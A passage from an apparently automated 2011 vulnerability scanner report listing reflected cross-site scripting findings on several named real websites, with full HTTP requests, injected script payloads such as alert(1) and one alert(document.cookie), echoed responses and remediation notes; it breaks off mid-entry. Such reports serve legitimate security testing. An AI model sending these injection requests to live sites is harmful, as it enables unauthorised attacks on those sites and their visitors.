Date: Fri, 18 Feb 2011 15:00:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 41197

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.thecounter.com with position ciu
url: /?6955f--><script>alert(1)</script>e525c47aab4=1 -->
...[SNIP]...

3.119. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fd89--><script>alert(1)</script>3e9f72d52de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?6fd89--><script>alert(1)</script>3e9f72d52de=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:03 GMT
Content-Type: text/html
Content-Length: 46036

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?6fd89--><script>alert(1)</script>3e9f72d52de=1 -->
...[SNIP]...

3.120. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 236a8--><script>alert(1)</script>8d68ddba170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:39 GMT
Content-Type: text/html
Content-Length: 45210

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 -->
...[SNIP]...

3.121. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a773--><script>alert(1)</script>cf39e5ac2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:52 GMT
Content-Type: text/html
Content-Length: 44681

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 -->
...[SNIP]...

3.122. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d2f7f--><script>alert(1)</script>c4dfa717f01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:30 GMT
Server: Apache
Set-Cookie: PHPSESSID=b6743747b67654794e4b7778bff3bbae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47159


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 -->
...[SNIP]...

3.123. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 74a93--><script>alert(1)</script>e34ffffc7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 58520

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 -->
...[SNIP]...

3.124. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 30741--><script>alert(1)</script>8e229fc5059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:35 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:35 GMT
Connection: close
Content-Type: text/html
Content-Length: 70479

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 -->
...[SNIP]...

3.125. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eff60--><script>alert(1)</script>398ed0a3768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:31 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 46084

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 -->
...[SNIP]...

3.126. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d970c--><script>alert(1)</script>4f484edfe23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 56546

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 -->
...[SNIP]...

3.127. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 54029--><script>alert(1)</script>63b507b24db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 73083

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 -->
...[SNIP]...

3.128. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2c2ad--><script>alert(1)</script>4971a9e3236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=1aef4ce19b0c7295ffe34788ae8d2b26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27599


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 -->
...[SNIP]...

3.129. http://www.vbforums.com/ [86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vbforums.com
Path:   /

Issue detail

The value of the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 request parameter is copied into an HTML comment. The payload 5a5d7--><script>alert(1)</script>74c957928d3 was submitted in the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 HTTP/1.1
Host: www.vbforums.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bblastvisit=1298042195; bblastactivity=0; QUADIDX=107; intmintc__welcome; toURL=http%3A//www.vbforums.com/%3F86b8b--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E5c1edad1dc6%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:17:37 GMT
Server: Apache
Set-Cookie: bblastactivity=0; expires=Sat, 18-Feb-12 15:17:37 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 143137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1
url: /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 -->
...[SNIP]...

3.130. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vbforums.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 86b8b--><script>alert(1)</script>5c1edad1dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 HTTP/1.1
Host: www.vbforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:48 GMT
Server: Apache
Set-Cookie: bblastvisit=1298040768; expires=Sat, 18-Feb-12 14:52:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Sat, 18-Feb-12 14:52:48 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 159129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1
url: /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 -->
...[SNIP]...

3.131. http://www.vibrantmedia.com/whatisIntelliTXT.asp [ipid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vibrantmedia.com
Path:   /whatisIntelliTXT.asp

Issue detail

The value of the ipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be08d"><script>alert(1)</script>e28a8bea8e2 was submitted in the ipid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /whatisIntelliTXT.asp?ipid=${ipid}be08d"><script>alert(1)</script>e28a8bea8e2&cc=${cc}&server=${itxtserver} HTTP/1.1
Host: www.vibrantmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92299
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCDQBRBC=GHDMDPOCNOHIJBJAACFHCFBH; path=/
p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
Date: Fri, 18 Feb 2011 14:45:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...
<input type="hidden" name="IPID" value="${ipid}be08d"><script>alert(1)</script>e28a8bea8e2">
...[SNIP]...

3.132. http://www.virtacore.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtacore.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5a33</script><script>alert(1)</script>2f6c2775163 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c5a33</script><script>alert(1)</script>2f6c2775163=1 HTTP/1.1
Host: www.virtacore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 14:52:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11144942;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/
Set-Cookie: CFTOKEN=96782673;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Virtacore Home- Cloud H
...[SNIP]...
<!--
           _uacct='UA-19578445-1';redux.load({uid:'11144942-96782673',history:true, tid:2, tmpid:1, url:'index.cfm', sid:15, query:'c5a33</script><script>alert(1)</script>2f6c2775163=1', name:'index',title:'Virtacore Home- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed Cloud Servers | Virtualization',"resource":[{"type":"CSS","title":"template1CSS","id":"template1
...[SNIP]...

3.133. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-fihotspotlist.com
Path:   /

Issue detail

